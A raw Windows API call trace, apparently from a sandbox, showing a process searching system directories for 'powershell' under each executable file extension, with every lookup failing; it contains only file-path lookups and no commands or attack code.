	[0356.500] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.501] SetErrorMode (uMode=0x1) returned 0x1
	[0356.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.501] SetErrorMode (uMode=0x1) returned 0x1
	[0356.501] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.501] SetErrorMode (uMode=0x1) returned 0x1
	[0356.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.502] SetErrorMode (uMode=0x1) returned 0x1
	[0356.502] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.502] SetErrorMode (uMode=0x1) returned 0x1
	[0356.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.502] SetErrorMode (uMode=0x1) returned 0x1
	[0356.502] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.502] SetErrorMode (uMode=0x1) returned 0x1
	[0356.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.503] SetErrorMode (uMode=0x1) returned 0x1
	[0356.503] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.503] SetErrorMode (uMode=0x1) returned 0x1
	[0356.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.503] SetErrorMode (uMode=0x1) returned 0x1
	[0356.503] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.504] SetErrorMode (uMode=0x1) returned 0x1
	[0356.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.504] SetErrorMode (uMode=0x1) returned 0x1
	[0356.504] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.504] SetErrorMode (uMode=0x1) returned 0x1
	[0356.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.505] SetErrorMode (uMode=0x1) returned 0x1
	[0356.505] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.505] SetErrorMode (uMode=0x1) returned 0x1
	[0356.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.505] SetErrorMode (uMode=0x1) returned 0x1
	[0356.505] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.505] SetErrorMode (uMode=0x1) returned 0x1
	[0356.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.506] SetErrorMode (uMode=0x1) returned 0x1
	[0356.506] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.506] SetErrorMode (uMode=0x1) returned 0x1
	[0356.506] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.506] SetErrorMode (uMode=0x1) returned 0x1
	[0356.506] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.507] SetErrorMode (uMode=0x1) returned 0x1
	[0356.507] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.507] SetErrorMode (uMode=0x1) returned 0x1
	[0356.507] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.507] SetErrorMode (uMode=0x1) returned 0x1
	[0356.507] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.507] SetErrorMode (uMode=0x1) returned 0x1
	[0356.508] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.508] SetErrorMode (uMode=0x1) returned 0x1
	[0356.508] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.508] SetErrorMode (uMode=0x1) returned 0x1
	[0356.508] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.508] SetErrorMode (uMode=0x1) returned 0x1
	[0356.509] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.509] SetErrorMode (uMode=0x1) returned 0x1
	[0356.509] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.509] SetErrorMode (uMode=0x1) returned 0x1
	[0356.509] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.509] SetErrorMode (uMode=0x1) returned 0x1
	[0356.509] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.510] SetErrorMode (uMode=0x1) returned 0x1
	[0356.651] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.651] SetErrorMode (uMode=0x1) returned 0x1
	[0356.651] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.651] SetErrorMode (uMode=0x1) returned 0x1
	[0356.651] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.652] SetErrorMode (uMode=0x1) returned 0x1
	[0356.652] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.652] SetErrorMode (uMode=0x1) returned 0x1
	[0356.652] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.652] SetErrorMode (uMode=0x1) returned 0x1
	[0356.652] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.652] SetErrorMode (uMode=0x1) returned 0x1
	[0356.653] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.653] SetErrorMode (uMode=0x1) returned 0x1
	[0356.653] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.653] SetErrorMode (uMode=0x1) returned 0x1
	[0356.653] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.653] SetErrorMode (uMode=0x1) returned 0x1
	[0356.654] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.654] SetErrorMode (uMode=0x1) returned 0x1
	[0356.654] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.654] SetErrorMode (uMode=0x1) returned 0x1
	[0356.654] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.654] SetErrorMode (uMode=0x1) returned 0x1
	[0356.655] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.655] SetErrorMode (uMode=0x1) returned 0x1
	[0356.655] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.655] SetErrorMode (uMode=0x1) returned 0x1
	[0356.655] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.655] SetErrorMode (uMode=0x1) returned 0x1
	[0356.655] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.656] SetErrorMode (uMode=0x1) returned 0x1
	[0356.656] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.656] SetErrorMode (uMode=0x1) returned 0x1
	[0356.656] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.656] SetErrorMode (uMode=0x1) returned 0x1
	[0356.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.656] SetErrorMode (uMode=0x1) returned 0x1
	[0356.657] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.657] SetErrorMode (uMode=0x1) returned 0x1
	[0356.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.657] SetErrorMode (uMode=0x1) returned 0x1
	[0356.657] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.657] SetErrorMode (uMode=0x1) returned 0x1
	[0356.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.658] SetErrorMode (uMode=0x1) returned 0x1
	[0356.658] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.658] SetErrorMode (uMode=0x1) returned 0x1
	[0356.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.658] SetErrorMode (uMode=0x1) returned 0x1
	[0356.658] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.659] SetErrorMode (uMode=0x1) returned 0x1
	[0356.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.659] SetErrorMode (uMode=0x1) returned 0x1
	[0356.659] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.659] SetErrorMode (uMode=0x1) returned 0x1
	[0356.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.659] SetErrorMode (uMode=0x1) returned 0x1
	[0356.660] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.660] SetErrorMode (uMode=0x1) returned 0x1
